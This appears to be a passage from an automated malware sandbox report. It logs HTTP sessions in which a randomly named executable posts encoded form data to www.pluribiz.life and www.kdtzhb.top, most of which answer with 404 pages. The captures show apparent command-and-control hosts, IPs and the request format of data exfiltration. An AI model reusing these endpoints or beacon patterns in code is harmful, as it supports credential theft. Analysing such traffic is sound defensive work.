                                                                        Data Raw: 32 37 37 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                                        Data Ascii: 2774<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                                        Nov 7, 2024 17:58:36.369148970 CET1236INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63
                                                                        Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-rep
                                                                        Nov 7, 2024 17:58:36.369180918 CET1236INData Raw: 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                        Data Ascii: -image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address {
                                                                        Nov 7, 2024 17:58:36.369193077 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                        Data Ascii: font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { te
                                                                        Nov 7, 2024 17:58:36.369204044 CET1236INData Raw: 39 42 34 51 55 7a 73 56 31 58 4b 46 54 7a 44 50 47 2b 4c 66 6f 4c 70 45 2f 4c 6a 4a 6e 7a 4f 30 38 51 43 41 75 67 4c 61 6c 4b 65 71 50 2f 6d 45 6d 57 36 51 6a 2b 42 50 49 45 37 49 59 6d 54 79 77 31 4d 46 77 62 61 6b 73 61 79 62 53 78 44 43 41 34
                                                                        Data Ascii: 9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTE
                                                                        Nov 7, 2024 17:58:36.369214058 CET1236INData Raw: 70 34 56 46 69 4c 38 57 4d 2f 43 6c 38 53 46 34 70 67 74 68 76 74 48 6d 34 71 51 55 49 69 51 64 59 2b 35 4e 4d 66 75 2f 32 32 38 50 6b 71 33 4e 5a 4e 4d 71 44 31 57 37 72 4d 6e 72 77 4a 65 51 45 6d 49 77 4b 73 61 63 4d 49 2f 54 56 4f 4c 6c 48 6a
                                                                        Data Ascii: p4VFiL8WM/Cl8SF4pgthvtHm4qQUIiQdY+5NMfu/228Pkq3NZNMqD1W7rMnrwJeQEmIwKsacMI/TVOLlHjQjM1YVtVQ3RwhvORo3ckiQ5ZOUzlCOMyi9Z+LXREhS5iqrI4QnuNlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFtt
                                                                        Nov 7, 2024 17:58:36.369224072 CET1236INData Raw: 57 78 51 78 75 6b 6e 67 75 4a 31 53 38 34 41 52 52 34 52 77 41 71 74 6d 61 43 46 5a 6e 52 69 4c 32 6c 62 4d 2b 48 61 41 43 35 6e 70 71 2b 49 77 46 2b 36 68 68 66 42 57 7a 4e 4e 6c 57 36 71 43 72 47 58 52 79 7a 61 30 79 4e 4f 64 31 45 31 66 73 59
                                                                        Data Ascii: WxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6hhfBWzNNlW6qCrGXRyza0yNOd1E1fsYUC7UV2Jop7XyXbsw90KYUInjpkRcecWfkEmdCAehgueuTmNt+shkReKd3v67nP9cNDJHvoD++xdvpovXKCp5SfoGxHsj0yF+IwHUus7smVh8IHVGIwJtLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8
                                                                        Nov 7, 2024 17:58:36.369235039 CET1236INData Raw: 6f 6e 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 63 6f 64 65 22 3e 34 30 34 3c 2f 73 70 61 6e 3e 0a 20 20 20
                                                                        Data Ascii: on class="response-info"> <span class="status-code">404</span> <span class="status-reason">Not Found</span> </section> <section class="contact-info"> Please forward this
                                                                        Nov 7, 2024 17:58:36.369246006 CET442INData Raw: 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 70 61 6e 65 6c 2e 63 6f 6d 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 63 70 61 6e 65 6c 77 68 6d 26 75 74 6d 5f
                                                                        Data Ascii: "container"> <a href="http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg"


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        13192.168.2.749854209.74.64.58803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:58:41.863027096 CET646OUTPOST /afcr/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 215
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.pluribiz.life
                                                                        Origin: http://www.pluribiz.life
                                                                        Referer: http://www.pluribiz.life/afcr/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 6b 7a 38 48 43 47 6a 41 57 74 6f 43 58 46 37 31 71 64 76 37 6b 45 47 48 5a 6e 70 57 48 61 34 4e 35 52 77 36 6e 31 49 57 53 6f 33 6c 79 6d 4f 6e 77 2f 74 61 36 78 30 57 4f 65 47 75 54 43 4b 75 79 76 44 2f 69 64 77 33 30 6e 46 56 69 6d 4a 71 6e 35 72 59 4b 42 50 76 30 69 6c 46 48 65 55 2f 37 62 47 41 6c 32 70 2f 4b 75 70 34 37 42 4b 36 79 78 70 76 69 33 54 64 78 48 4a 30 71 61 37 64 79 56 31 37 31 37 68 36 49 78 50 37 45 56 6f 2b 34 4c 6c 4d 35 74 35 75 59 6e 48 6b 56 6b 67 39 66 67 6a 36 67 76 37 57 68 37 36 47 43 4c 53 65 68 64 4c 31 55 7a 4c 69 58 47 48 4f 45 36 6c 5a 39 4d 76 6c 58 4e 39 77 31 64 49 75 56 6b 37 64 56 77 3d 3d
                                                                        Data Ascii: 7j=kz8HCGjAWtoCXF71qdv7kEGHZnpWHa4N5Rw6n1IWSo3lymOnw/ta6x0WOeGuTCKuyvD/idw30nFVimJqn5rYKBPv0ilFHeU/7bGAl2p/Kup47BK6yxpvi3TdxHJ0qa7dyV1717h6IxP7EVo+4LlM5t5uYnHkVkg9fgj6gv7Wh76GCLSehdL1UzLiXGHOE6lZ9MvlXN9w1dIuVk7dVw==
                                                                        Nov 7, 2024 17:58:42.534456968 CET533INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 16:58:42 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        14192.168.2.749855209.74.64.58803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:58:44.408447981 CET666OUTPOST /afcr/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 235
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.pluribiz.life
                                                                        Origin: http://www.pluribiz.life
                                                                        Referer: http://www.pluribiz.life/afcr/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 6b 7a 38 48 43 47 6a 41 57 74 6f 43 57 6d 6a 31 70 37 6e 37 31 6b 47 45 46 33 70 57 4f 36 34 4a 35 52 4d 36 6e 30 4d 47 53 37 66 6c 79 43 4b 6e 7a 36 42 61 33 52 30 57 61 4f 47 76 4c 69 4b 70 79 76 4f 4b 69 59 49 33 30 6e 52 56 69 69 4e 71 6e 49 72 66 49 52 50 68 37 43 6b 6a 4b 2b 55 2f 37 62 47 41 6c 77 46 52 4b 75 78 34 36 78 36 36 79 54 4e 73 38 6e 54 53 34 6e 4a 30 75 61 37 52 79 56 30 63 31 2b 64 63 49 33 4c 37 45 58 67 2b 34 5a 64 4e 7a 74 34 6e 47 58 48 79 64 6e 42 78 57 56 54 4a 6f 38 50 54 70 72 47 4c 4f 64 54 38 37 2f 48 5a 4b 69 7a 5a 54 45 6a 34 54 63 34 73 2f 4e 72 39 61 76 4a 52 71 71 74 45 59 32 61 5a 44 4d 34 6d 33 2f 37 42 4f 6f 53 35 2b 53 71 76 5a 33 2b 63 34 78 51 3d
                                                                        Data Ascii: 7j=kz8HCGjAWtoCWmj1p7n71kGEF3pWO64J5RM6n0MGS7flyCKnz6Ba3R0WaOGvLiKpyvOKiYI30nRViiNqnIrfIRPh7CkjK+U/7bGAlwFRKux46x66yTNs8nTS4nJ0ua7RyV0c1+dcI3L7EXg+4ZdNzt4nGXHydnBxWVTJo8PTprGLOdT87/HZKizZTEj4Tc4s/Nr9avJRqqtEY2aZDM4m3/7BOoS5+SqvZ3+c4xQ=
                                                                        Nov 7, 2024 17:58:45.071439028 CET533INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 16:58:44 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        15192.168.2.749856209.74.64.58803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:58:47.112903118 CET1679OUTPOST /afcr/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 1247
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.pluribiz.life
                                                                        Origin: http://www.pluribiz.life
                                                                        Referer: http://www.pluribiz.life/afcr/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 6b 7a 38 48 43 47 6a 41 57 74 6f 43 57 6d 6a 31 70 37 6e 37 31 6b 47 45 46 33 70 57 4f 36 34 4a 35 52 4d 36 6e 30 4d 47 53 39 48 6c 79 52 43 6e 70 64 56 61 32 52 30 57 5a 4f 47 69 4c 69 4c 31 79 72 69 52 69 59 4e 49 30 6c 70 56 7a 78 46 71 68 38 2f 66 43 52 50 68 2b 79 6b 33 48 65 55 71 37 62 32 45 6c 77 31 52 4b 75 78 34 36 33 2b 36 69 52 70 73 2b 6e 54 64 78 48 49 37 71 61 36 4f 79 56 74 6a 31 2f 4e 71 49 48 72 37 45 33 77 2b 36 71 6c 4e 2f 74 34 70 48 58 47 78 64 6e 4d 7a 57 52 7a 2f 6f 39 37 35 70 73 69 4c 4c 35 43 39 75 2b 7a 2b 64 42 48 6c 4e 6d 4c 4a 63 73 78 45 2b 4d 33 62 53 64 4e 7a 6e 4b 4e 34 41 55 79 46 4a 70 56 31 32 65 33 2b 56 4c 2b 53 32 55 54 51 63 57 75 66 36 45 52 70 69 48 62 7a 6d 61 57 44 65 5a 77 52 6c 48 35 30 48 69 4c 39 56 79 67 50 43 4f 69 57 54 5a 6f 66 73 33 44 57 31 74 68 4e 50 57 64 77 62 68 77 61 42 5a 46 51 39 4d 44 38 7a 53 6a 2b 64 59 49 4b 42 53 39 32 65 43 72 50 62 4e 6d 78 2f 46 2f 4b 49 4f 68 61 54 45 2f 31 53 51 31 78 39 77 59 30 32 64 4a 65 2f 6e 75 [TRUNCATED]
                                                                        Data Ascii: 7j=kz8HCGjAWtoCWmj1p7n71kGEF3pWO64J5RM6n0MGS9HlyRCnpdVa2R0WZOGiLiL1yriRiYNI0lpVzxFqh8/fCRPh+yk3HeUq7b2Elw1RKux463+6iRps+nTdxHI7qa6OyVtj1/NqIHr7E3w+6qlN/t4pHXGxdnMzWRz/o975psiLL5C9u+z+dBHlNmLJcsxE+M3bSdNznKN4AUyFJpV12e3+VL+S2UTQcWuf6ERpiHbzmaWDeZwRlH50HiL9VygPCOiWTZofs3DW1thNPWdwbhwaBZFQ9MD8zSj+dYIKBS92eCrPbNmx/F/KIOhaTE/1SQ1x9wY02dJe/nuLHaWilGqd+SbLUthSIle0H0oCLrQP3D/EbDEpilBjhgYH+BTTyAOxaV9f5qrwtI69BCg9sqpCf10Pwzb8g1MHtGePv1cKZ7t0Ews/z+yxRsPh59a0fVg05fwVtfVuc4flW0e93idYYWmakLHvcFcaaGDy2UEaprcrAmhrWq9orLy1AUvGgnK0pQEGpOvUiqa3gHaoc49B/rFwwFbw9/POKbgI+seoT235wb4+k6HWLvoLXSyKZloj5cCVDSdi3KEgE324TdTQyJX773oMGzVYa1PWEhAZxNjHW+Jxt9iEV0KxEj8rIXyhnYzzjsTlqp2UMmbD4M4hDdH/hSmakHggEsOM5WHEiXXkv1oQaJLaQfZtmHls6IHZTgClhpeUM7ZylRVS7vE07vZsjpGndg5tsvC47GvaPQmStEd2zKpdd/hI2FnPt2e3gfIcGmr0txWCmeONRMvXcfjsAq/REABAeYrGlPFUVjqAvW7zYsUiRjuPa09maJk9JEG0NmwS1CfVzM2mljmplUnJhVjNGf1Dwl8VVDI07zjl6JWrKMGD8a6dVYH9gJmm6s6V8ePnP0V3lAl5HtLnCq5eanHPxuTym5KSE6hqH4jBQ5+xefKlsxFt+zFQKGB3FfUp3dXQZ5gPWg5x5djefhjl4glkDXvElCukc0TG9VnMc [TRUNCATED]
                                                                        Nov 7, 2024 17:58:47.721957922 CET533INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 16:58:47 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        16192.168.2.749857209.74.64.58803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:58:49.657613039 CET390OUTGET /afcr/?7j=pxUnB3/JQIgHT0Xru4WA6nCBQFxpXJgMoApNpkZ5FdrdhyTQr+Z8vQ44Z+GGNzyuoe7kishsw1Bs9wd8tp/8BBfqyAxJMs0BkbyFlX94FNsmynKB1TNzikOc40xRpv+r7CBu5ZxKJnGu&UvgPX=o0HdzhbpI6gx HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Connection: close
                                                                        Host: www.pluribiz.life
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Nov 7, 2024 17:58:50.336545944 CET548INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 16:58:50 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        17192.168.2.74985847.242.89.146803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:58:55.792196989 CET637OUTPOST /1iqa/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 215
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.kdtzhb.top
                                                                        Origin: http://www.kdtzhb.top
                                                                        Referer: http://www.kdtzhb.top/1iqa/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 4a 4b 77 4a 39 41 53 68 76 53 65 41 45 34 68 2f 39 37 2f 55 69 32 41 6a 57 33 35 45 33 36 36 45 36 71 39 4c 77 69 45 6d 51 53 59 4f 63 6c 4a 45 41 56 36 64 4a 6c 6c 6d 63 46 51 64 36 52 69 79 59 55 49 57 79 6e 54 34 4f 4f 70 46 56 52 6c 62 61 36 41 4e 2b 33 32 38 76 72 66 6d 73 57 53 34 34 61 46 67 39 74 6f 5a 59 75 44 78 50 75 4b 2f 57 61 4a 71 33 4c 33 7a 4b 58 57 32 59 4a 4f 58 4b 56 38 72 50 59 43 7a 45 44 4c 37 69 70 70 49 38 4f 63 4c 36 2f 59 4e 6f 42 56 55 7a 49 43 63 59 75 44 32 45 58 58 32 59 31 53 7a 67 69 6f 4b 70 39 42 44 55 43 42 55 39 57 69 55 72 66 74 78 63 38 78 6d 78 69 57 6d 6b 39 65 43 4a 58 59 42 66 67 3d 3d
                                                                        Data Ascii: 7j=JKwJ9AShvSeAE4h/97/Ui2AjW35E366E6q9LwiEmQSYOclJEAV6dJllmcFQd6RiyYUIWynT4OOpFVRlba6AN+328vrfmsWS44aFg9toZYuDxPuK/WaJq3L3zKXW2YJOXKV8rPYCzEDL7ippI8OcL6/YNoBVUzICcYuD2EXX2Y1SzgioKp9BDUCBU9WiUrftxc8xmxiWmk9eCJXYBfg==
